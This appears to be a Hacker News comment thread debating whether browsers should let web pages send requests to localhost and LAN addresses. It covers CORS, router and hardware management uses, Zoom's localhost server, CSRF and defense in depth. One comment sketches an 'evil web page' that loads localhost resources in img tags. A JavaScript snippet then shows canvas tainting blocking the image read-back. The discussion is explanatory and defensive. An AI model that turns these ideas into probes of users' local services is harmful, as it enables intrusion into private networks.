It is beyond sad that this was upvoted on HACKERnews. This is an intentional feature of web browsers and a specified feature of web standards. Could it use improvement? Maybe. Should we disable localhost requests from webpages? Abso-fucking-lutely not.
"Is this possibility not surprising to you?"
> no
"It was surprising to me!"
> that is because you don't understand the web
"The problem is actually worse than this."
> I wouldn't call it a problem
"The major browsers I've tested — Safari, Chrome, Firefox — all allow web pages to send requests not only to localhost but also to any IP address on your Local Area Network!"
> Yes, that's called conforming to a standard and it took years of work to get them all to behave the same.
In other news, the sky is blue, trees are green, and shooting yourself in the foot still makes you bleed.
I'm interested in learning more about the use cases and standard for this, because, yes, I don't perfectly understand the web. Can you share your knowledge and point to resources that I can read?
CORS allows websites to specify which other origins (beyond their "same origin") can access their resources. A simple example is how jQuery allows any website to load jQuery scripts from their CDN.
CORS also works on the local network, or even localhost, as the author has discovered for himself here. Uses in these spaces are less ubiquitous, but if you have ever needed to set up a web enabled resource in these spaces, you may need CORS. I'll give some theoretical uses here:
1. A company sells routers. They host a webpage at company.com that makes requests to your router at <scary ip>
2. A company sells a big, expensive hardware component that attaches to your computer. To manage this component, they set up a website at company.com, and the component sets up a website on your computer. Company.com makes requests to localhost, to manage that big, expensive component.
The actual issue here is that companies setting up these websites at localhost and in your local network do not securely set up CORS (see Zoom, other issues). Although it would be unreasonable to kill these use cases, it would be reasonable to require the user of the browser to check off that a localhost or local network request is okay.
Simply disallowing access to private network space is a non-starter, since it’s used so frequently. For example, a typical use case is that an office has a private IP space, e.g. 10.0.0.0/8, and various external services will link into it, e.g. Gmail, Okta.
Disallowing access to localhost seems more plausible, especially if there’s an exception for extensions so that things like 1Password can continue to work.
We can debate over whether or not browsers should work this way, but if you're reading this and are technically inclined, the best immediate right-now takeaway is that your intranet isn't perfectly secure.
As always, you should practice defense in depth and work to secure your internal network from potential bad actors attacking from within your internal network. NATs offer you partial security and make some attacks harder; but you can't just throw up a private web server without authentication and say, "it's on a NAT, so it's secure."
This is especially true in the IOT world, where the threat to your network may not even be coming from a browser/website. Multiple layers of defense are the way to go, because no single layer is impenetrable.
> The major browsers I've tested — Safari, Chrome, Firefox — all allow web pages to send requests not only to localhost but also to any IP address on your Local Area Network! Can you believe that? I'm both astonished and horrified.
I guess this should serve as a cue that there is something off in what you are writing. You did not just discover a major security flaw in all web browsers while not being an experienced (at least web) software engineer.
> The major browsers I've tested — Safari, Chrome, Firefox — all allow web pages to send requests not only to localhost but also to any IP address on your Local Area Network! Can you believe that? I'm both astonished and horrified.
Wait, what? Is this sarcasm? This is by definition how networking operates.
I hope not. The whole point of the web is that you can link to anything and make requests to any service. Forcing websites to be walled off from each other just because some servers aren't secure would suck.
The author points out Safari's handling of this, but in reality, I think you'd need to address this on a per-browser basis. Zoom said they added this behaviour _because_ Safari added a confirmation which Chrome (and presumably others?) did not have.
Pretty much everyone involved in the infosec community has known and understood this for the past 20 years or more. I'm not sure how this can make things any worse. If anything it will make things better because now more people are learning how the web is actually designed, right?
Somehow I missed the word “hat” there and had to reread that a few times... was trying to figure out why a couple of dodgy apps had escalated into a race war, haha.
NoScript ABE guards against this in its default configuration. Unfortunately, I think the feature is only in the legacy addon version, not the post-Quantum one.
To be fair, this is a slightly different issue. External websites can presumably link to file:// or localhost URLs (the one in your comment works fine from the HN website), but they can't transmit any information about the resource back to their servers. That's also true of images (unless the server serving the image allows it via CORS).
An evil web page at example.com/evil can certainly contain an img tag for http://localhost/me.jpg or http://dropbox.com/private-photo.jpg. You will see your private images displayed on their web site, but while that may be disturbing (or even useful for phishing), the evil web page cannot transmit the image data back to itself. For example, it can't use JavaScript to load the image into a canvas, base64 encode the canvas, and POST it back to itself, because the canvas will become "dirty" as soon as the image is loaded into it, and the browser will not allow JavaScript code to dump a dirty canvas to any inspectable format.
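A sketch of what that taint rule looks like in practice: drawing the cross-origin image succeeds, but reading the pixels back throws.

    // The image renders, but the canvas becomes "dirty" (tainted) the moment
    // a cross-origin image is drawn into it, so read-back is blocked.
    const img = new Image();
    img.onload = () => {
      const canvas = document.createElement("canvas");
      canvas.width = img.width;
      canvas.height = img.height;
      const ctx = canvas.getContext("2d");
      ctx.drawImage(img, 0, 0);   // allowed: display only
      try {
        canvas.toDataURL();       // throws a SecurityError: no exfiltration
      } catch (e) {
        console.log("blocked:", e.name);
      }
    };
    img.src = "http://localhost/me.jpg"; // the URL from the example above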
They can redirect you as well (or you can put a non-image inside an image tag). Which means you have to make sure it's safe to merely navigate to a page/resource, otherwise you have a "Confused Deputy" vulnerability (i.e. CSRF).
[1] https://news.ycombinator.com/item?id=20399551